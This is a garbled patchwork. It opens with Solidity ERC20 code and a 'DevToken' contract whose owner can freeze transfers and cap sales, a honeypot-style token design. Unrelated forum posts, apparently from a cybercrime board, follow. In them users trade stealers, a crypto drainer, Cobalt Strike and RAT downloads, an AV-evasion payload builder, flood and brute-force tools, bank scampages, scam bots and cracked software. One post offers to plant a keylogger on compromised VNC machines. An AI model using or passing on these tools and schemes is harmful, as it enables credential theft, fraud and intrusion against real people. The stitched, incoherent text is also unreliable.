* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an {Approval} event.
*
* Requirements:
*
* - `owner` cannot be the zero address.
* - `spender` cannot be the zero address.
*/
function _approve(
address owner,
address spender,
uint256 amount
) internal virtual {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
/**
* @dev Updates `owner` s allowance for `spender` based on spent `amount`.
*
* Does not update the allowance amount in case of infinite allowance.
* Revert if not enough allowance is available.
*
* Might emit an {Approval} event.
*/
function _spendAllowance(
address owner,
address spender,
uint256 amount
) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance != type(uint256).max) {
require(currentAllowance >= amount, "ERC20: insufficient allowance");
unchecked {
_approve(owner, spender, currentAllowance - amount);
}
}
}
/**
* @dev Hook that is called before any transfer of tokens. This includes
* minting and burning.
*
* Calling conditions:
*
* - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
* will be transferred to `to`.
* - when `from` is zero, `amount` tokens will be minted for `to`.
* - when `to` is zero, `amount` of ``from``'s tokens will be burned.
* - `from` and `to` are never both zero.
*
* To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
*/
function _beforeTokenTransfer(
address from,
address to,
uint256 amount
) internal virtual {}
/**
* @dev Hook that is called after any transfer of tokens. This includes
* minting and burning.
*
* Calling conditions:
*
* - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
* has been transferred to `to`.
* - when `from` is zero, `amount` tokens have been minted for `to`.
* - when `to` is zero, `amount` of ``from``'s tokens have been burned.
* - `from` and `to` are never both zero.
*
* To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
*/
function _afterTokenTransfer(
address from,
address to,
uint256 amount
) internal virtual {}
}
// File: DevToken.sol
pragma solidity ^0.8.0;
contract DevToken is ERC20, Ownable {
// процент сколько можно продать максимум
uint256 public allowedSellPercent = 100;
// структура и мапа холдеров токена
struct holder {
uint256 buy;
uint256 sell;
address addr;
}
mapping(address => holder) public holders;
// мапа пулл адресов
mapping(address => address) public poolAddresses;
// лочим все трансферы
bool public canTransfer = true;
// мапа вайтлиста адресов откуда разрешены переводы
mapping(address => address) public wlFrom;
// мапа вайтлиста адресов куда разрешены переводы
mapping(address => address) public wlTo;
// мапа админских адресов, которые могут продавать и покупать сколько угодно
mapping(address => address) public globalWl;
constructor() ERC20("Web3Unity", "W3U") {
_mint(msg.sender, 1000000*10**decimals());
}
function setLiquidityPoolAddress(address addr) public onlyOwner {
poolAddresses[addr] = addr;
}
function setAllowedSellPercent(uint256 percent) public onlyOwner {
allowedSellPercent = percent;
}
function _beforeTokenTransfer(address from, address to, uint256 amount) internal override {
super._beforeTokenTransfer(from, to, amount);
if (!isInGlobalWl(from, to)) {
// проверяем можно ли слать или есть ли адрес в вайтлисте
require(
canTransfer || isInWl(from, to),
"Transfers are blocked");
// покупка
if (poolAddresses[from] != address(0)) {
holders[to].buy += amount;
holders[to].addr = to;
}
// продажа
if (poolAddresses[to] != address(0)) {
// получаем сколько еще можно продать
uint256 canSell = holders[from].buy*allowedSellPercent/100;
uint256 alreadySold = holders[from].sell;
uint256 leftSell = canSell - alreadySold;
require(leftSell >= amount, "You can't sell this number of tokens");
holders[from].sell += amount;
holders[from].addr = from;
}
}
}
function isInWl(address from, address to) private view returns(bool) {
return wlFrom[from] != address(0) || wlTo[to] != address(0);
}
function isInGlobalWl(address from, address to) private view returns(bool) {
return globalWl[from] != address(0) || globalWl[to] != address(0);
}
function toggleBlockTransfers() public onlyOwner {
canTransfer = !canTransfer;
}
function addAddrWlFrom(address addr) public onlyOwner {
wlFrom[addr] = addr;
}
function addAddrWlTo(address addr) public onlyOwner {
wlTo[addr] = addr;
}
function removeAddrWlFrom(address addr) public onlyOwner {
delete wlFrom[addr];
}
function removeAddrWlTo(address addr) public onlyOwner {
delete wlTo[addr];
}
function setAddGlobalWl(address addr) public onlyOwner {
globalWl[addr] = addr;
}
function removeAddGlobalWl(address addr) public onlyOwner {
delete globalWl[addr];
}
}
Ребята, подскажите софт который вытягивает шеллы с с-панелей (кроме фокса).
Буду признателен, если кто-нибудь поделится или продаст.
Приветствую, форумчане! Поделитесь пожалуйста актуальным и эффективным ТОН драйнером, который есть сейчас на рынке, буду признателен.
Greetings! Please share the relevant and effective TON Drainer that is currently on the market, I would appreciate it.
Ищу актуальный софт по бруту роутеров. Буду рад любой полезной информации на эту тему. Брошурки, мануалы или где вообще ознакомиться с этой темой можно.
В общем написал софт, но он оказался никому не нужный XD. Чтобы добру не пропадать, то можете получить его в моем боте. Еще +- месяц будет работать сервер, где обрабатывается спам функции, а чекер сервисов без сервера, если надо будет то продлю.
Функционал:
Twitter - создание постов, накрутка
лайков/просмотров/репостов/комментов/подписчиков, парсинг пользователей, спам
дм и так же мультикрут, чекер.
Instagram - создание постов/истории, накрутка
лайков/репостов/комментов/подписчиков, чекер.
(Использует netscape cookies, подробнее в мануале)
Собственно мануал: https://telegra.ph/Traff-tool-09-17 (Прочтите перед
стартом, если будут вопросы, то пишите в тг)
Ссылка на бота: https://t.me/traff_toolSell_bot (Никак не реклама, софт
всегда будет бесплатным)
VirusTotal:
](https://www.virustotal.com/gui/file/a21923721aa26f099c9b4de1089b6961a109d8c5f6716a9cc890c60684a16fea?nocache=1)
VirusTotal
www.virustotal.com
Используйте на тестовом сервере
Hello everyone. I want to share this interesting software with everyone.
<https://www.salvationdata.com/business-list-page/smartphone-forensic-system- professional/>
Link: <https://mega.nz/file/CfgixDTQ#bwXUFZGsOxjuKtjvmnQ-
JjjVfIhCA2HHSefXj0o4u5U>
Link: <https://mega.nz/file/vLxlwTAR#9EreLPp-
cOhFIYCN6jEhqizXEdSeQVVzjloO08F3Ofg>
Password: xss.is
Credentials: Admin/123456
Note: Follow the instructions, the software works perfectly, I am not here to
help with the installation. If you can't follow them don't use the tool.
Credit to: Pwn3rzs
скинте кряк в пм плиз хорошей програмы и помогите с координировать)
New features:
X- Summary: the 64bit payloads are FUD, the payloads in 32bit I have several
ideas to make them undetectable but if you have some I am a taker.
1- Code fully reviewed and redrafted.
2- 32bit payloads can now be executed in remote processes.
3- Junkcode injector reviewed.
4- The xor encryption stub has changed.
5- Added UPX packer.
6- Enhanced escape module.
7- You can now get a hash of your payload (MD5/SHA256).
8- New injection method (Thread Hijacking).
9- Deleted post-processing module.
I have lots of feature ideas coming soon, but I'd like to do it cleanly so I'm
taking my time.
I sent the update to show that I still maintain MsfMania, with undetectable
64bit payloads and soon the 32bit.
There will certainly be payloads other than Executable Laptops, I would like
to diversify.
Powershell payloads, Metasploit scripts, and so on.
Don't hesitate to give me ideas!
](https://github.com/G1ft3dC0d3/MsfMania)
Python AV Evasion Tools. Contribute to JarVices/MsfMania development by creating an account on GitHub.
github.com
Кидаю вам мой старый метод сделанный для одного стрессера в свое время,
подойдет для сайтов без защиты на базе hpack с фреймами и невалидным тлс из за
проблемы в ноде и кривым рейтом. По поводу рапиды он может работать на очень
старых сайтах
Для запуска нужны прокси в формате ip:port http и hpack с nodejs
Все интуитивно понятно и просто для отображения статус кодов используется
—debug
Если зайдет сделаю специальный на ноде флудер для анпротект таргетов с норм
параметрами
стиллер на golang + python, внутри инструкция
links: https://fex.net/ru/s/dvklvdt
Code:Copy to clipboard
https://send.exploit.in/download/5f44c66c7cb87ed3/#s7h6yR-MC-jhYqT_Oh65Cg
https://download.ru/files/khiRylJ7
https://gofile.io/d/HU9hp7
http://temp.sh/jldjV/cobaltstrike-dist.rar
https://oshi.at/ZXZgk/cobaltstrike-dist.rar
https://litter.catbox.moe/e539pu.rar
Сабж собственно. Есть у кого-то данное творение? Сайт разраба мертв.
И вдогонку вопрос- именно по чеку дедиков на валид. Я понимаю, что есть
решение от z668, но есть ли что-то попроще - банально на входе список, на
выходе Good/Bad?
Goes to the fedex URL and generates a set of 20 various tracking codes based off of a number pattern then cracks them
Cam- Hackers — это целый список брученных айпишников камер аж 145 стран.
Инструкция:
$ pkg update
$ pkg upgrade
$ pkg install python
$ pkg install python2
$ pkg install python3
$ pkg install git
$ git clone https://github.com/AngelSecurityTeam/Cam-Hackers
$ cd Cam-Hackers
$ python3 cam-hackers.py
Hidden content for authorized users.
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F5e209977709e63c1f26d13ee79fae5ec2aa5c48bc24625678472808dda2976db%2FBGDonLINE%2FVenom5-HVNC- Rat&hash=689611adbac7037c1d1b4e8022fa0acb&return_error=1)
](https://github.com/BGDonLINE/Venom5-HVNC-Rat)
https://venomcontrol.com/. Contribute to BGDonLINE/Venom5-HVNC-Rat development by creating an account on GitHub.
github.com
Good tool to scan PLC devices: <https://plcdatatools.com/plc-data- tools/demo_download/plc-scanner-software/>
Hello mates
[LIKES = 2] https://anonfile.com/71p7of93na/ORIGIN_BRUTE_CHECKER_V1.1_CAPTURE_ALL_GAMES_KEYWORDS_SEARCH_rar
https://anonfile.com/A2N62dkdb2/SLAYER_Leecher_v0.6_Keywords._zip
](https://anonfile.com/S8O4l1x1ne/KeyWords_Paypal_2019-2020_zip)
anonfile.com
](https://anonfile.com/x6A1r840n5/SQLI_Dumper_with_keywords_zip)
anonfile.com
](https://anonfile.com/Fc9bScndn6/Creacion_de_keywords_BASICAS_para_Leecher_pdf)
anonfile.com
](https://cdn-02.anonfile.com/lbOaVec2b4/a67ed798-1562131771/q_posts_till20171109_as_confirmedbyq.pdf)
cdn-02.anonfile.com
](https://cdn-02.anonfile.com/MfDbO5d2b8/3c2922b1-1568536382/Pervasive+information+architecture.pdf)
cdn-02.anonfile.com
(2017).pdf - AnonFiles ](https://cdn-02.anonfile.com/Fb0d8en8na/eadaf6b7-1570731861/Wall+Street+Playboys+-+Efficiency_+Get+Rich+Without+Giving+Up+Your+Life+%282017%29.pdf)
cdn-02.anonfile.com
](https://cdn-03.anonfile.com/27v8Zdc2bb/e5288dff-1559780446/ClhaofInsErdedi.pdf)
cdn-03.anonfile.com
](https://cdn-03.anonfile.com/gbYbk6efbe/3c81dd71-1564954527/Coudenhove- Kalergi-Practical-Idealism-English.pdf)
cdn-03.anonfile.com
](https://cdn-04.anonfile.com/o9b1r6d0b8/69fb6a2d-1564944558/Q%27s+posts+-+CBTS+-+4.0.0.pdf)
cdn-04.anonfile.com
](https://cdn-05.anonfile.com/x9EfW5ebb3/6953c85d-1557964299/api.steampowered.com.ini)
cdn-05.anonfile.com
](https://cdn-06.anonfile.com/y1hfA5ddb6/73ee7baf-1566861820/Q%27s+posts+-+CBTS+-+6.5.1.pdf)
cdn-06.anonfile.com
](https://cdn-07.anonfile.com/wbY3w9f7b7/92ab3af2-1567687416/Network+Warrior%2C+2nd+Edition.pdf)
cdn-07.anonfile.com
](https://cdn-07.anonfile.com/K4vdB0wcbe/e55a82b3-1560119501/Katies+FE+Gui.txt)
cdn-07.anonfile.com
](https://cdn-11.anonfile.com/f3v3C3h4bc/da488ccf-1572387436/HMA+Proxyless.ini)
cdn-11.anonfile.com
](https://cdn-11.anonfile.com/H0w2C5dbb0/8f1aaf4a-1572067187/Spotify+Proxyless+10-15+Bots.ini)
cdn-11.anonfile.com
](https://cdn-11.anonfile.com/Aeu3cddeb7/d3b856ba-1566832088/Q-Map+22nd+Nov+2017_opt.pdf)
cdn-11.anonfile.com
](https://cdn-11.anonfile.com/0cAboadab4/bb0681f1-1565907708/Q%27s+posts+-+CBTS+-+3.7.3.pdf)
cdn-11.anonfile.com
](https://cdn-11.anonfile.com/j3386fpbn5/88dd3ba9-1573912670/FN+Keywords_VxDoM.txt)
cdn-11.anonfile.com
](https://cdn-12.anonfile.com/Ublapeddb7/97261fea-1552554275/Q%27s+posts+-+CBTS+-+3.9.0.pdf)
cdn-12.anonfile.com
https://cdn-12.anonfile.com/5dpdv9d3b6/dda95807-1573392454/Q's+posts+-+CBTS+-+4.4.0.pdf [/LIKES]
Оригинальный cobaltstrike.jar (version 4.9.1)
Проверить хэш тут https://verify.cobaltstrike.com
pass - как всегда xss.is
забрать -
https://mega.nz/file/5OUWEB7Q#17d_0kthPC9e0BDp84VDqdBo77efDnzRfaK6-MpcqWo
Занарее спасибо
Ищу софт под покупку или аренду для накрутки зрителей онлайн
Good afternoon guys, I'm looking for someone who is a Swift.com subscriber or
can help with purchasing licenses. contact me for this job.
Pm
Hi guys;
The BurpSuite2021.8.2 version was released yestarday on August 24, 2021; It is a stable version.
This version upgrades the embedded browser and fixes the issues reported to our bug bounty program!
BurpSuite verify code;
Code:Copy to clipboard
SHA256: f8706df120be5478c6da361b316050e7b8423d9973f0b1a946de57c4085355a6
MD5: 71e8cc40c9617095c94bdc19fc34494e
Download burp from official website;
![portswigger.net](/proxy.php?image=https%3A%2F%2Fportswigger.net%2Fcontent%2Fimages%2Flogos%2Fportswigger- twittercardlogo.png&hash=53435290e04357dc60aaad8c2244e6b1&return_error=1)
](https://portswigger.net/burp/releases/professional-community-2021-8-2)
This release upgrades the embedded browser and fixes an issue that was reported to our bug bounty program. Embedded browser upgrade Burp's embedded Chromium browser has been updated to version 92.0.45
portswigger.net
note!! don 't forget to vote for participate in Xss.is Context! 7days left & you have ability to vote for 3 !! no only 1
./r1z
Searching for punisher software or its creator
Pm
Требуется софт (чекер/парсер) для определения web клиента/движка корпоративных почт. Есть что-то в паблике из такого? Так чтобы засунул туда список email адресов, софтина их прочекала и выдала результат, где и какой движ используется/установлен
Или ищу способ конвератации токена в кук
Требуется получать скриншот по списку ip vnc
Имеется что либо подобное?
node tls-bypass.js target time rate thrads proxyfile
VT -
youk
Download - https://files.fm/u/3gvpmrg7fs
Всем привет, может кто нибудь подскажет скрипты для автоматизации lpe на линукс/винду?
Срочно ищу carbon black antivirus. ПМ кто может.
Куплю софт для чека сидов на баланс
New Features
- Added support for the Zend Framework in the PHP IAST AcuSensor
New Vulnerability Checks
- New check for Oracle E-Business Suite iStore open user registration
- New check for InfluxDB Unauthorized Access Vulnerability
- New check for Bonita Authorization Bypass (CVE-2022-25237)
- New check for Oracle ADF Faces ‘Miracle’ RCE (CVE-2022-21445)
Updates
- Various DeepScan Improvements
- Updated to Chromium 104.0.5112.101 (Linux) / 104.0.5112.102 (Windows)
- Improved XSS in URI (folder/file)
- Improved handling of SourceMaps
- Updated exposed web installers check
- Updated exposed development files check
- Updated exposed monitoring systems check
Fixes
- Fixed issue in the PHP IAST AcuSensor when reporting SCA components
- Fixed scanner crash
Linux:
https://mega.nz/file/i5M2lJwB#KxvTmH26MpGXqwlk9PtD1hZoBzAu9tHjzaDazLmozis
Windows:
https://mega.nz/file/Pxs1QIQK#RLlDIIidBD_wRA347GYD_7UiOQB9sy1ElrEfnL0GRfI
PIDRILA: Python Interactive Deepweb-oriented Rapid Intelligent Link Analyzer - это действительно быстрый прототип асинхронного веб-сканера, разработанный командой Bright Search для всех этичных нетсталкеров. Написан на python. Сканер имеет большую скорость работы, имеет поддержку proxy. Сканирует структуру сайта, ищет файлы, каталоги, которые могут содержать критическую информацию.
Код:
git clone https://github.com/enemy-submarine/pidrila.git
cd pidrila
pip3 install -r requirements.txt
Увидел на другом форуме интересная софтинка да и название может кому пригодиться
For everyone who claims that I integrate backdoors into the programs on my
site
This is a conversation with the first person who spread lies and all the
fools, unfortunately, believed it
https://i.ibb.co/WnxL1sY/h0nus-Raid-Forums.jpg
You can read the conversation in the Telegram group from the link in that message
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2Fjt3FbDYgaNq8b022GoztX56doBsfrTT1BuIrEMoO771Kbz6ufgK4_RpwjYbO1yohVSKn6tWYaLIB4vrDi7IBVGYbfLGlugKy5JJY1s-B2i1XLl2Tc_4CWuDYstQAWMylhqFMyO1VzFElDethByOxlZdbehx2lTHyLdMWs3tmELNOFgUtLSbfoBO5TtyCAimP_xGc_3Pe0s5GCtW420YYkBdEa0k24QLEwjWpspdw89xIjQx65cFNFm7WVhVY4tsAtlkhydhEW29cLOpHP9agX9hgLW27lnKdPWUpiRy- dlxJvRke6l4BOjAew9pOPOUthbbWpebV2UoKXxwniF87Cw.jpg&hash=30176847082b758048dd0aec44c407ec&return_error=1)
](https://t.me/r0_chat/24320)
IDA Pro Advanced Floating License [ Windows + Linux + Mac ] 😎
t.me
**This person named honus
He was evading proof of what he said about me incorporating backdoors and
malicious things into the programs available on my site into the conversation.
I took the most important Screenshots of the conversation in Zip Archive
My advice to all of you
Don't be a fool like others to spread rumors without real evidence**
Ищу vnc сканнер по ip что бы мог делать скрины.
Всем привет, у меня вопрос, сколько будет стоить следующий набор для взлома.
Взлом серверов:
1)Сканер ip диапозонов на открытые порты.
2)Чекер банеров (Софт для чека банера, того или иного порта)
3)Софт для брута по комболисту (log:pass) и по отдельному списку логинов и
паролей. - ftp,mssql,mysql,postgresql,ssh.
Здравсвуйте) Есть ли бесплатный более менее рабочий стиллер ? скинте ссылку может на гитхабе есть? покупать пока не готов так просто потестить ,Заранее спасибо)
Если у вас есть Source code чекера, оставьте ссылку на обменик, интересуют
только C++ / Rust / Golang. (На счет первых двух не уверен, есть ли
реализации)
На площадках типу vx underground не получалось отыскать
WellsFargo Scampage
VirusTotal Link:
https://www.virustotal.com/gui/file...b1b264b2fc2b84beea443799152f9365ab5?nocache=1
](https://ufile.io/psltybdb)
Download wellsfargo.zip for free from ufile.io instantly, no signup required and no popup ads
ufile.io
Happy Spamming.
Требуется кодер QIWI чекер для своих аккаунтов.
Функционал: чекер киви на балансы.
В лс.
Бюджет: 2500р
Работа легкая.
dell
Достаточно мне будет человека, который может делать билд для тимы. Отпишите, если есть такие тут люди
День добрый форумчани
Нужна помощь по программе Ibm IBridge designer, может кто и работал, может кто
и настраивал или стыкался и данным софтом от компании IBM.
Суть вопроса в том как правильно связать таблицы в которых есть два ключа.
Hello,
A question, who have Ermac3 here? Since they are more builder floating around
I wanted to compare how many files you have and if the permissions are granted
automatically on your builder since on my builder the permissions not granted
automatically and it makes two applications on the launcher.
Who is willing to compare the Builder? I know one guy which does have much more Kotlin files then me but the permissions are still not granted automatically, that's strange. Is Ermac3 built so?
Couldn't find any share here so i decide to share with you guys who finding
it.
its KL remota , cost quite a few $k but here we go.
Spoiler: Download
anonfiles.com
I am looking for a good live panel, for finland, greece, germany, belguim.
Ищу...
Здравствуйте. Есть доступы к машинкам холдеров по внц, можно прогрузить что
угодно.
Нужен софт типо логгера, который будет записывать на холдером логины пароли и
карты и отстукивать куда-либо. Уже есть такое на рынке?
И подскажите, что бы еще интересного прогрузить в них?
Программа-оптимизатор для виндоус сервера, отрубающая кучу вещей ради производительности, помогите вспомнить, плз)
Im looking for best one .
I can buy if it good. But looking for a free one
Hello everyone,
Someone got the crack of Binary Ninja (the reverse engineering tool) and can
publish please?
Pass - Adel1nk4S!
Модуль для BruteCore, сам бруткор скачать можно отсюда ->
https://xss.is/threads/107438/post-767926
Исходники модуля -> https://www.sendspace.com/file/zwg7j8
Скомпилинный модуль -> https://www.sendspace.com/file/l3fpzo
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F6a15e03e20fbee20ebec38e8ca52e18d868fa600e3064169e5bc1188635caca3%2FBC- SECURITY%2FMoriarty&hash=0f388d013cde82e217cf18ce640dd886&return_error=1)
SECURITY/Moriarty)
Contribute to BC-SECURITY/Moriarty development by creating an account on GitHub.
github.com
Расширенный сканер уязвимостей xRay Web Полная активация
Отсутствие ложных срабатываний без ущерба для бизнеса
Каждая лазейка подверглась реальным экспериментальным исследованиям с использованием усовершенствованного семантического анализа + инновационной технологии обнаружения, чтобы гарантировать, что лазейка является реальной и эффективной, во избежание массовых искажений, влияющих на бизнес-суждение, и для экономии ресурсов безопасности。
Сообщество Xray - это бесплатная платформа инструментов для белых шляп,
запущенная Nagaki Technology. В настоящее время в сообществе есть
рентгеновский сканер лазейки Radium reptile
Инструменты были созданы многими опытными разработчиками безопасности и
десятками тысяч участников сообщества.
Множество удивительных функций в одном
Обнаружение распространенных веб-уязвимостей
Встроенные 10+ общих модулей обнаружения веб-уязвимостей, поддерживающие точное обнаружение распространенных уязвимостей, таких как SQL-инъекция, XSS, выполнение команд, включение файлов и т. Д.
200+ POC
Более 200 встроенных высококачественных POC, представленных сообществом,
охватывающих веб-уязвимости с высоким риском за последние три года реальных
боевых действий, и все они бесплатны для использования.
Специальные возможности тестирования
Расширенная версия поддерживает обнаружение исторических уязвимостей с высоким
риском в таких фреймворках, как struts, fastjson, thinkphp, Shiro и т. Д.,
Одним щелчком мыши.
Алгоритм обнаружения NG
Интеллектуальное обнаружение - это не пустая болтовня, основанная на
многолетнем опыте экспертов по безопасности в нападении и защите и выражении
его с помощью уникального и эффективного метода обнаружения.
Поддержка глубокой настройки
Многие элементы конфигурации открываются в файле конфигурации, и возможности
движка можно значительно настроить, настроив соответствующие параметры.
Метод сканирования из нескольких источников
Поддержка пассивного прокси, базового сканера, поискового робота, одного URL и
других источников ввода не обязательна, и вы можете использовать прокси для
расширения самостоятельно.
Поисковый робот
Сканер rad может динамически отображать веб-сайты с различными фреймворками и
запрашивать обходы, не упуская «скрытые углы», в которых существуют лазейки.
Высокоинтерактивный доступ к странице
При моделировании поведения человека при щелчке, вводе и других операциях,
интеллектуальная остановка, возврат, продолжение щелчка и другие операции.
Постоянные итеративные обновления
Важные проблемы быстро исправляются, а серьезные уязвимости продолжают
добавляться для поддержания жизнеспособности
Вы можете использовать расширенный сканер уязвимостей xRay Web с Acunetix Premium
Activated -WwW.Dr-FarFar.CoM.zip
Size : 24.5 MB**
You must have at least 30 reaction(s) to view the content.
Доброго времени! Слышал не так давно появился какой-то стиллер симбиоз
TriangleDB, Pegasus и GoldPickaxe.
Может кто то знает, отпишите пожалуйста
Есть много файлов по 1-2 гб с xml, нужен конвертор в CSV. Проблема ещё в том, что в некоторых объектах xml могут меняться поля (номера тлф и другое)
Nowa wersja narzędzia Keytap do rozpoznawania tekstu wpisywanego na klawiaturze za pomocą wibracji akustycznych.
![github.com](/proxy.php?image=https%3A%2F%2Frepository- images.githubusercontent.com%2F146330145%2F9c73bd00-7405-11e9-8648-24d2efc7d67d&hash=cf2988641188fa97a201b9e0930ebf3b&return_error=1)
](https://github.com/ggerganov/kbd-audio)
🎤⌨️ Acoustic keyboard eavesdropping. Contribute to ggerganov/kbd-audio development by creating an account on GitHub.
github.com
Works best with Exodus
MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.
www.mediafire.com
Возьмём к примеру Redline логи с одного и того же ПК, но за разные даты.
Пример:
В данном случае рассмотрим строки 4-5 и 7-8.
Нужно, чтобы скрипт, или софт сверял названия папок по первым 36 символам, и
если они совпадают - оставлял только одну папку с таким именем, а остальные
совпадения удалял.
Чем можно реализовать такую задачу?
?Всем привет!?
Только на нашем канале вы можете приобрести
?приватный стиллер "SPACE STEALER" за 1400 руб НАВСЕГДА.
В чем его отличие от ему
подобных
Логи собираются в памяти без создания "лишних"
файлов️
Не
оставляет
следов️
Работа
через тг
бота️
Не
нужно покупать дедики и
VDS️
Вам нужно лишь зарегистрировать хостинг,все остальное будет сделано за
вас️
Все логи остаются у вас(Сливы исключены)
Обновления гарантированы
Малая часть возможностей стиллера:
Сбор логинов, паролей, куки, закладок, истории, крединтых карт.
Pc info
Anti Virtual Machines, Debaggers:
Discord
Jabber
Telegram
VPN
FTP Clients
Crypto Wallets
При переходе с нашего канала назовите кодовое слово "MuRra1N" и получите
скидку в 200 руб за билд.
Так же предоставляются услуги крипта билда fud стабами по цене 650 руб.
И естественно, при переходе с нашего канала назовите кодовое слово "MuRra1N" и
и за 450 руб вы получите чистый
билд️
Оплата принимается в :BTC,QIWI,Payeer,Банкир
Очень часто на этом форуме в разделе Базы звучит вопрос, а чем открыть большие файлы? И в ответ начинают советовать EmEditor, glogg и т.д. Но все эти программы и рядом не валялись с этой маленькой утилитой, которая открывает файлы ЛЮБОГО РАЗМЕРА! Ей без разницы сколько весит файл, хоть 90 ГБ, хоть 1 Кб, ) Открывает их моментально...
Можно читать и проводить поиск. Естественно, редактировать их она уже не
может...
Так что, если кто спросит чем открыть, сразу советуйте Lister.
Hidden content for authorized users.
Облако Mail.ru - это ваше персональное надежное хранилище в интернете.
cloud.mail.ru
Вопрос по программе у меня начали появляться в кобальте компы которые я не добавлял и много, и ниже скрин будто бы кто то кроме меня подключается, скажите кто разбирается помимо меня кто то сидит? коба получается паленый какой то что кроме меня еще кто то сидит? наскрине neo2 neo3 это немой аккаунт я хз кто это
запись, запись, с 5 пустыми программируемыми картами + инструменты для персонализации SIM-карт
Есть у кого такая программа?
Hello i'm here again !
This time i will publish my keygen for Netsparker Enterprise (or Acunetix 360 for windows).
It's highly protected to avoid leechers/ skimmers
Hidden content for authorized users.
Download: <https://mega.nz/file/uhkj2SiA#Flj5NRoii6E6ER_NC2PmT5OG_hvXjkQ-
lUrD0kK5MPs>
VT:
https://www.virustotal.com/gui/file/2c7f5b333386d3c9f485911fcd6b8c49ab38f7176537e39036c8ffb45dfde1a9
SHA-256: 2c7f5b333386d3c9f485911fcd6b8c49ab38f7176537e39036c8ffb45dfde1a9
ANY.RUN: https://app.any.run/tasks/1792400d-5861-4dda-92ce-380dc594f641
Hybrid-Analysis: [https://www.hybrid-
analysis.com/sam...5911fcd6b8c49ab38f7176537e39036c8ffb45dfde1a9](https://www.hybrid-
analysis.com/sample/2c7f5b333386d3c9f485911fcd6b8c49ab38f7176537e39036c8ffb45dfde1a9)
NOTE : I won't provide setups as my source asked to not share them , but you can find around some of them
SoftPerfect Network Scanner v7.2.9 x64 + лицензия
![send.exploit.in](/proxy.php?image=https%3A%2F%2Fsend.exploit.in%2Fsend- fb.358d4b57.jpg&hash=824ffe54bac782fbc1c2b7f04639d4b7&return_error=1)
](https://send.exploit.in/download/c0410c975f90f3fe/#iv3zMWuYmudOUqVoxNeOSA)
Encrypt and send files with a link that automatically expires to ensure your important documents don’t stay online forever.
send.exploit.in
За софт не ручаюсь, лицензия не моя, использовать на свой страх и риск
pass:xss.is
Добрый вечер форумачене , я хотел слить пак годных ботов в телеграмм
В паке присутсвует:
-_Инструкция по установке
- Фейк Глаз Бога
- Хелпер Скамера
- Пособие скамера
- Бот для скама с админкой
- Гарант бот от Scrooge
- 21 очко (казино)
- Казино за 1500
- Кубик (слив привата)
- Скам бот на Iqos
- Приватный смс бомбер
- Отрисовщик
- Скам гарант бот
- Бот автопродаж 2.0 (+ версия 1.0)
- Бот для заявок воркеров
- Бот для скама с админкой
Боты готовые всего лишь надо поставить свои реквизеты , токен и готово бот принадлежит вам
Скачать - https://cloud.mail.ru/public/jknn/37PpzD827_
VT
-https://www.virustotal.com/gui/file...92a3c3605b8c73c16bf2a10f09d4d0a7803cf/summary
источник - https://*********/threads/2498624/
I don’t know what happened, but someone came to the R0 CREW 41 telegram chat and leaked IDA Pro 7.6 SP1!
Looks like the Chinese guys have leaked IDA Pro again…
Источник: https://forum.reverse4you.org
video:
[video=youtube]
original file (don't cracked and cleaned) :
https://www.virustotal.com/gui/file...4ed76071ce9cff24e871826a7389287d06b?nocache=1
cracked and cleaned file :
https://www.virustotal.com/gui/file...3f9b8401235c0ec68976b7f408a2ea28282?nocache=1
download link :
Hidden content for authorized users.
Mirrorcreator - Upload files to multiple hosts ](https://www.mirrored.to/files/1UZQ63XJ/TSP_Dork_Generator_V12_Cracked_And_Cleaned_By_GokhanR00T.7z_links)
Securely upload your files, media and documents to more than 30 cloud storage providers simultaneosuly. Remote Upload files to Google Drive and many other hosts.
www.mirrored.to
I Tried For You
Don't Leech Please.
Leave a REP + Like
SHARING WITH YOU A PRIVATE
SCAMPAGE
BUILT WITH TYPESCRIPT (HTML,CSS,JS & PHP CONFIG) EASY TO SETUP & WORKS WITH
ALL HOSTINGS
**
**
TG CHANNEL:https://t.me/El_PRO_Channel
**CODER TG :https://t.me/EL_PROFESSOR_SY
DOWNLOAD LINK **
https://x0.at/1UVC.zip
Скачать:
![gofile.io](/proxy.php?image=https%3A%2F%2Fgofile.io%2Fdist%2Fimg%2Flogo- small-og.png&hash=32429581fada6ae1887e27dfa99f76aa&return_error=1)
](https://gofile.io/d/35WsR8)
Gofile is a free file sharing and storage platform. You can store and share data of all types. There is no limit and everything is free.
gofile.io
Pyfiscan - это бесплатный сканер уязвимостей и версий веб-приложений, который можно использовать для поиска устаревших версий распространенных веб- приложений на серверах Linux. Pyfiscan также содержит инструмент для создания оповещений по электронной почте с использованием шаблонов.
scanner ](https://github.com/fgeek/pyfiscan)
Free web-application vulnerability and version scanner - fgeek/pyfiscan
github.com
Всем привет, интересный стилак нашел в гите написанный на Go, решил закинуть
сюда может кому-то пригодится.
Go-written Malware targeting Windows systems, extracting User Data from
Discord, Browsers, Crypto Wallets and more, from every user on every disk.
Hidden content for authorized users.
Скачать - https://github.com/hackirby/skuld | virustotal - https://www.virustotal.com/gui/file...66f7543e5808e4c8b49b925788ea8030c26?nocache=1
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2Fdf02e32e89b3764a8d81b917100a821312ad8d5edf34c39596a69daa632246db%2FXenocodeRCE%2FNoisette- Obfuscator&hash=1c5e67a4985e2c16869ec5f9c032db29&return_error=1)
assembly ](https://github.com/XenocodeRCE/Noisette-Obfuscator)
An Obfuscator for .NET assembly. Contribute to XenocodeRCE/Noisette-Obfuscator development by creating an account on GitHub.
github.com
Добрый день, сщу софт под Mac parallels для камня m1 крякнутый. Может сталкивался кто нибудь с этой проблемой поделитесь ссылкой или софтом. За ранее благодарен.
Может кто знает где можно купить? Версию с неограниченным числом проверок
P.S. Для тех кто в танке - нужна офф. лицензия. Кряк я и сам могу скачать
